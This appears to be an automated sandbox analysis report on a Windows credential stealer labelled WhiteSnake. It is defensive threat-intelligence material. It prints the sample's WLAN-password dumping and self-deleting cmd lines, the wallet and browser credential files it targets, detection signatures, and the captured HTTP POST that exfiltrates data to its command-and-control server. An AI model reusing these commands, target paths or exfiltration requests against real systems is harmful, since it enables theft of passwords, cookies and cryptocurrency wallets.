      Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
      Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
      Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\user\Desktop\file.exe"
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\timeout.exe timeout /t 3
      Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation
      Source: C:\Windows\System32\netsh.exe | Queries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\netsh.exe | Queries volume information: C:\ VolumeInformation
      Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

      Lowering of HIPS / PFW / Operating System Security Settings

      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles

      Stealing of Sensitive Information

      Source: Yara match | File source: Process Memory Space: file.exe PID: 7260, type: MEMORYSTR
      Source: file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: %AppData%\Electrum\wallets
      Source: file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: >%AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
      Source: file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: %exodus.conf.json;exodus.wallet\*.seco
      Source: file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: $%AppData%\Jaxx\Local Storage\leveldb
      Source: file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: %AppData%\Exodus
      Source: file.exe, 00000000.00000002.1710856387.000001D7A7773000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: dC:\Users\user\AppData\Roaming\Binance
      Source: file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: &%LocalAppData%\Coinomi\Coinomi\wallets
      Source: file.exe, 00000000.00000002.1710856387.000001D7A7715000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: dC:\Users\user\AppData\Roaming\ledger live
      Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
      Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
      Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
      Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
      Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
      Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
      Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
      Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
      Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
      Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
      Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
      Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

      Remote Access Functionality

      Source: Yara match | File source: Process Memory Space: file.exe PID: 7260, type: MEMORYSTR
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts221
      Windows Management Instrumentation
      1
      LSASS Driver
      1
      LSASS Driver
      11
      Disable or Modify Tools
      1
      OS Credential Dumping
      1
      File and Directory Discovery
      Remote Services1
      Archive Collected Data
      1
      Ingress Tool Transfer
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts1
      Native API
      1
      DLL Side-Loading
      1
      DLL Side-Loading
      2
      Obfuscated Files or Information
      1
      Credentials in Registry
      24
      System Information Discovery
      Remote Desktop Protocol2
      Data from Local System
      2
      Encrypted Channel
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
      Access Token Manipulation
      1
      Timestomp
      Security Account Manager221
      Security Software Discovery
      SMB/Windows Admin Shares1
      Email Collection
      1
      Non-Standard Port
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook11
      Process Injection
      1
      DLL Side-Loading
      NTDS1
      Process Discovery
      Distributed Component Object ModelInput Capture3
      Non-Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      File Deletion
      LSA Secrets151
      Virtualization/Sandbox Evasion
      SSHKeylogging3
      Application Layer Protocol
      Scheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      Masquerading
      Cached Domain Credentials1
      Application Window Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items151
      Virtualization/Sandbox Evasion
      DCSync1
      System Network Configuration Discovery
      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
      Access Token Manipulation
      Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
      Process Injection
      /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
      Behavior Graph ID: 1550690 | Sample: file.exe | Startdate: 07/11/2024 | Architecture: WINDOWS | Score: 100

      Top-level signatures: Multi AV Scanner detection for domain / URL; Suricata IDS alerts for network traffic; Found malware configuration; 9 other signatures
      Contacted domain: ip-api.com

      file.exe (started)
        Network: 147.124.221.201, 49731, 8080 AC-AS-1US United States
        Network: ip-api.com 208.95.112.1, 49730, 80 TUT-ASUS United States
        Dropped: C:\Users\user\AppData\Local\...\file.exe.log, CSV
        Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Tries to steal Mail credentials (via file / registry access); 5 other signatures
        cmd.exe (started)
          Signatures: Uses netsh to modify the Windows network and firewall settings; Tries to harvest and steal WLAN passwords
          netsh.exe (started); conhost.exe (started); 2 other processes
        cmd.exe (started)
          netsh.exe (started); conhost.exe (started); 2 other processes
        cmd.exe (started)
          conhost.exe (started); timeout.exe (started); chcp.com (started)

      Source | Detection | Scanner | Label | Link
      file.exe | 100% | Avira | HEUR/AGEN.1307453
      file.exe | 100% | Joe Sandbox ML
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      Source | Detection | Scanner | Label | Link
      Name | IP | Active | Malicious | Antivirus Detection | Reputation
      ip-api.com | 208.95.112.1 | true | false | | high

      Name | Malicious | Antivirus Detection | Reputation
      http://ip-api.com/line?fields=query,country | false | | high
      http://147.124.221.201:8080/sendData?pk=QzU5OUI3MkVDOEQxQjhFMTM4MUIyQTcyNTlBOUQ4N0Q=&ta=RGVmYXVsdA==&un=am9uZXM=&pc=OTgwMTA4&co=VW5pdGVkIFN0YXRlcw==&wa=MA==&be=MA== | true | Avira URL Cloud: safe | unknown
      Name | Source | Malicious | Antivirus Detection | Reputation
      IP | Domain | Country | ASN | ASN Name | Malicious
      208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
      147.124.221.201 | unknown | United States | 1432 | AC-AS-1US | true
      Joe Sandbox version: 41.0.0 Charoite
      Analysis ID: 1550690
      Start date and time: 2024-11-07 03:06:07 +01:00
      Joe Sandbox product: CloudBasic
      Overall analysis duration: 0h 2m 40s
      Hypervisor based Inspection enabled: false
      Report type: full
      Cookbook file name: default.jbs
      Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Number of analysed new started processes analysed: 15
      Number of new started drivers analysed: 0
      Number of existing processes analysed: 0
      Number of existing drivers analysed: 0
      Number of injected processes analysed: 0
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode: default
      Analysis stop reason: Timeout
      Sample name: file.exe
      Detection: MAL
                                                                                        Classification:mal100.troj.spyw.evad.winEXE@26/3@1/2
                                                                                        EGA Information:
                                                                                        • Successful, ratio: 100%
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 70%
                                                                                        • Number of executed functions: 17
                                                                                        • Number of non-executed functions: 7
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .exe
                                                                                        • Stop behavior analysis, all processes terminated
                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                        TimeTypeDescription
                                                                                        21:06:59API Interceptor11x Sleep call for process: file.exe modified
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        208.95.112.1file.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                                                        • ip-api.com/line?fields=query,country
                                                                                        4tuMnSBgXFwIxMP.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • ip-api.com/line/?fields=hosting
                                                                                        20092837.exeGet hashmaliciousGuLoaderBrowse
                                                                                        • ip-api.com/line/?fields=hosting
                                                                                        dg4Bwri6Cy.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                        • ip-api.com/line/?fields=hosting
                                                                                        DHOYXfCAeB.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                        • ip-api.com/line/?fields=hosting
                                                                                        tfz7ikR76n.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • ip-api.com/line/?fields=hosting
                                                                                        RgAm3scap8.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                        • ip-api.com/line/?fields=hosting
                                                                                        173088012436cb09e4ff67d5495bafb892243773781ebe8236073aca4dd15efcce792bb9ed419.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • ip-api.com/line/?fields=hosting
                                                                                        aviso de transferencia de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                        • ip-api.com/line/?fields=hosting
                                                                                        REnBTVfW8q.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                        • ip-api.com/line/?fields=hosting
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        ip-api.comfile.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                                                        • 208.95.112.1
                                                                                        4tuMnSBgXFwIxMP.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 208.95.112.1
                                                                                        20092837.exeGet hashmaliciousGuLoaderBrowse
                                                                                        • 208.95.112.1
                                                                                        dg4Bwri6Cy.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                        • 208.95.112.1
                                                                                        DHOYXfCAeB.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                        • 208.95.112.1
                                                                                        tfz7ikR76n.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 208.95.112.1
                                                                                        RgAm3scap8.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                        • 208.95.112.1
                                                                                        173088012436cb09e4ff67d5495bafb892243773781ebe8236073aca4dd15efcce792bb9ed419.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 208.95.112.1
                                                                                        aviso de transferencia de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                        • 208.95.112.1
                                                                                        REnBTVfW8q.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                        • 208.95.112.1
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        TUT-ASUSfile.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                                                        • 208.95.112.1
                                                                                        4tuMnSBgXFwIxMP.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 208.95.112.1
                                                                                        20092837.exeGet hashmaliciousGuLoaderBrowse
                                                                                        • 208.95.112.1
                                                                                        dg4Bwri6Cy.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                        • 208.95.112.1
                                                                                        DHOYXfCAeB.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                        • 208.95.112.1
                                                                                        tfz7ikR76n.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 208.95.112.1
                                                                                        RgAm3scap8.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                        • 208.95.112.1
                                                                                        173088012436cb09e4ff67d5495bafb892243773781ebe8236073aca4dd15efcce792bb9ed419.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 208.95.112.1
                                                                                        aviso de transferencia de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                        • 208.95.112.1
                                                                                        REnBTVfW8q.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                        • 208.95.112.1
                                                                                        AC-AS-1US1730880306408ce5a11c4acbd87ce646537573d0c4601d89669cd8afd0c5878f4ef95c84f5795.dat-decoded.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                        • 147.124.222.72
                                                                                        arm7.elfGet hashmaliciousUnknownBrowse
                                                                                        • 147.124.40.29
                                                                                        la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                                        • 65.217.187.16
                                                                                        armv7l.elfGet hashmaliciousMiraiBrowse
                                                                                        • 147.124.15.96
                                                                                        PnjGB63sit.elfGet hashmaliciousMiraiBrowse
                                                                                        • 147.124.15.89
                                                                                        na.elfGet hashmaliciousMiraiBrowse
                                                                                        • 147.124.15.83
                                                                                        M3NRruYkxl.exeGet hashmaliciousAveMariaBrowse
                                                                                        • 147.124.214.5
                                                                                        na.elfGet hashmaliciousMiraiBrowse
                                                                                        • 147.124.15.54
                                                                                        SERVICE OR PRODUCT DESRIPTION AND COMPANY PROFILE.SCR.exeGet hashmaliciousRemcosBrowse
                                                                                        • 147.124.212.210
                                                                                        http://www.hycompressor.net/Get hashmaliciousHTMLPhisherBrowse
                                                                                        • 147.124.214.113
                                                                                        No context
                                                                                        No context
                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                        File Type:CSV text
                                                                                        Category:dropped
                                                                                        Size (bytes):1498
                                                                                        Entropy (8bit):5.364175471524945
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:ML9E4KQEAE4KKUNKKDE4KGKZI6KhPKIE4TKBGKoC1qE4GIs0E4K6sXE4Npv:MxHKQEAHKKkKYHKGSI6oPtHTHK1qHGI8
                                                                                        MD5:1B713A2FD810C1C9A8F6F6BE36F406B1
                                                                                        SHA1:0828576CB8B83C21F36AD29E327D845AB3574EBB
                                                                                        SHA-256:E51E809582894F4D484939BE3990DFC914E43F4AF72AE55A00B01FCFE348763B
                                                                                        SHA-512:D32200B7FA9D0DFEF4011D98D40260838A522E63C874FBCCE00D331D663169DBE1C613AD0E81C76F69A8CE6C7265605175CA75BA2C8BDA7748290B34579E148B
                                                                                        Malicious:true
                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f
                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                        File Type:very short file (no magic)
                                                                                        Category:dropped
                                                                                        Size (bytes):1
                                                                                        Entropy (8bit):0.0
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:U:U
                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                        Malicious:false
                                                                                        Preview:1
                                                                                        Process:C:\Windows\System32\timeout.exe
                                                                                        File Type:ASCII text, with CRLF line terminators, with overstriking
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.41440934524794
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:hYFqdLGAR+mQRKVxLZXt0sn:hYFqGaNZKsn
                                                                                        MD5:3DD7DD37C304E70A7316FE43B69F421F
                                                                                        SHA1:A3754CFC33E9CA729444A95E95BCB53384CB51E4
                                                                                        SHA-256:4FA27CE1D904EA973430ADC99062DCF4BAB386A19AB0F8D9A4185FA99067F3AA
                                                                                        SHA-512:713533E973CF0FD359AC7DB22B1399392C86D9FD1E715248F5724AAFBBF0EEB5EAC0289A0E892167EB559BE976C2AD0A0A0D8EFC407FFAF5B3C3A32AA9A0AAA4
                                                                                        Malicious:false
                                                                                        Preview:..Waiting for 3 seconds, press a key to continue ....2.1.0..
                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Entropy (8bit):5.507680890929418
                                                                                        TrID:
                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                        • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                        • Windows Screen Saver (13104/52) 0.07%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                        File name:file.exe
                                                                                        File size:158'208 bytes
                                                                                        MD5:c426f46f2c074eda8c903f9868be046d
                                                                                        SHA1:d0352482370beff107eb2b2f13e2de275fbc91c7
                                                                                        SHA256:7cba781d569196e89a86f10cee7d69918fe05df1461d1f0ed3426ccb2046002e
                                                                                        SHA512:97eed1bad31bd2e558d2cf6ff3c3026d828f561e2d1439f0daca420f53a3c6b1d59442f043357be9a33761a8e99ac935d08239d2e50811d47909cec8caad7c05
                                                                                        SSDEEP:3072:d0Elo8nshOJIlE+/sY3I9bf4gDJVYRhYKdDrQOu:dPlo8sh8+EY3I9bfdDbcyO
                                                                                        TLSH:F5F3F95BB2409FA4D15E8E72A1B213314360D9079E81BF4A5D9BE4D02DD32C6AB136FF
                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X............."...0..^..........^|... ........@.. ....................................`................................
                                                                                        Icon Hash:90cececece8e8eb0
                                                                                        Entrypoint:0x427c5e
                                                                                        Entrypoint Section:.text
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x400000
                                                                                        Subsystem:windows gui
                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                        Time Stamp:0xE480C158 [Mon Jun 25 20:55:52 2091 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:4
                                                                                        OS Version Minor:0
                                                                                        File Version Major:4
                                                                                        File Version Minor:0
                                                                                        Subsystem Version Major:4
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                        Instruction
                                                                                        jmp dword ptr [00402000h]
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x27c0c | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x28000 | 0x748 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2a000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x25c64 | 0x25e00 | 38278eb8d7651ee347dd3c95376751d2 | False | 0.4184844265676568 | data | 5.527582650945179 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x28000 | 0x748 | 0x800 | 429c42ce30e93d62dad0375ad663f16e | False | 0.44189453125 | data | 4.535915142151478 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x2a000 | 0xc | 0x200 | 9f1dfa1ae77f70e189a22ec3e0385709 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x280a0 | 0x4bc | data | | | 0.4793729372937294
RT_MANIFEST | 0x2855c | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-07T03:07:01.140283+0100 | 2050601 | ET MALWARE [ANY.RUN] WhiteSnake Stealer HTTP Request | 1 | 192.168.2.4 | 49731 | 147.124.221.201 | 8080 | TCP
2024-11-07T03:07:01.191138+0100 | 2050602 | ET MALWARE [ANY.RUN] WhiteSnake Stealer HTTP POST Report Exfiltration | 1 | 192.168.2.4 | 49731 | 147.124.221.201 | 8080 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 7, 2024 03:06:59.536093950 CET | 60533 | 53 | 192.168.2.4 | 1.1.1.1
Nov 7, 2024 03:06:59.543138981 CET | 53 | 60533 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 7, 2024 03:06:59.536093950 CET | 192.168.2.4 | 1.1.1.1 | 0x96e5 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 7, 2024 03:06:59.543138981 CET | 1.1.1.1 | 192.168.2.4 | 0x96e5 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
                                                                                        • ip-api.com
                                                                                        • 147.124.221.201:8080
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 208.95.112.1 | 80 | 7260 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
Nov 7, 2024 03:06:59.592438936 CET | 85 | OUT | GET /line?fields=query,country HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
Nov 7, 2024 03:07:00.186609983 CET | 199 | IN | HTTP/1.1 200 OK
Date: Thu, 07 Nov 2024 02:06:59 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 29
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
Data Raw: 55 6e 69 74 65 64 20 53 74 61 74 65 73 0a 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 0a
Data Ascii: United States173.254.250.79


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49731 | 147.124.221.201 | 8080 | 7260 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
Nov 7, 2024 03:07:00.785918951 CET | 253 | OUT | POST /sendData?pk=QzU5OUI3MkVDOEQxQjhFMTM4MUIyQTcyNTlBOUQ4N0Q=&ta=RGVmYXVsdA==&un=am9uZXM=&pc=OTgwMTA4&co=VW5pdGVkIFN0YXRlcw==&wa=MA==&be=MA== HTTP/1.1
Host: 147.124.221.201:8080
Content-Length: 134077
Expect: 100-continue
Connection: Keep-Alive
Nov 7, 2024 03:07:01.381724119 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 7, 2024 03:07:01.795144081 CET | 162 | IN | HTTP/1.1 200 OK
Content-Length: 36
Content-Type: application/json
Date: Thu, 07 Nov 2024 02:07:01 GMT
Server: waitress
